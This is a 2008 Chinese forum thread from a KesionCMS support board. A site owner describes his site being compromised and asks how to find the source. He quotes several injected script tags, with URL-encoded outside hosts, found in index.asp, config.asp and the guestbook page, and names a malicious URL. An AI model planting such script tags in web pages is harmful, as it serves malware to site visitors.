账号通
    

账号  

密码  

4749

查看

12

回复
主题:网站又被恶意挂马,不知道是何因 [收藏主题] 转到:  
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/11 23:38:00   | 显示全部帖子 查看该作者主题 楼主 
科汛在线网校系统
我用的是kesionV4.5这个版本,首页打开360拦到http://w.b2c3.cn/swf.htm(不要点,有毒)恶意网址
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/13 16:34:00   | 显示全部帖子 查看该作者主题 沙发 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 22:09:00   | 显示全部帖子 查看该作者主题 藤椅 
科汛智能建站系统
以下是引用56look在2008-9-12 18:08:00的发言:
可以找下查网站木马的软件

我是租用网上的虚拟主机,如何查?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 1:09:00   | 显示全部帖子 查看该作者主题 板凳 

频道栏目页的恶意代码就是发现不了在哪个文件,不知哪位能提供一下思路不?

 

Article文件夹中每个文件我都下下来看了,没有发现恶意代码。这个频道栏目页的恶意代码来自哪儿呢?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 0:59:00   | 显示全部帖子 查看该作者主题 报纸 
做在线知识付费 选科汛云开店

guestbook中的index.asp也被挂马:

 

<script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 0:48:00   | 显示全部帖子 查看该作者主题 地板 
科汛在线网校系统

config.asp也被注入:

 

<script language=javascript src=http://%77%77%2E%78%6E%69%62%69%2E%63%6F%6D/js.js></script><script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 0:34:00   | 显示全部帖子 查看该作者主题 7楼 
科汛在线考试系统(NET)

妈的,index.asp文件里面也有恶意代码:

<script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>

<script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/12 0:19:00   | 显示全部帖子 查看该作者主题 8楼 
科汛在线考试系统(NET)
清掉了conn.asp中的恶意代码,怎么访问网址还是一样有拦截?
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
rawell 当前离线

36

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:447 分
登录次数:28 次
注册时间:2007/2/9
最后登录:2013/5/21
rawell 发表于:2008/9/11 23:52:00   | 显示全部帖子 查看该作者主题 9楼 
科汛在线考试系统(NET)

仔细检查了一下,发现被SQL注入了代码,

<script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>


<script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js></script>

 

 

这几句代码会直接链接到某个网站吗?这个js.js文件到底存在哪儿?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行1.94531秒 powered by KesionCMS 9.0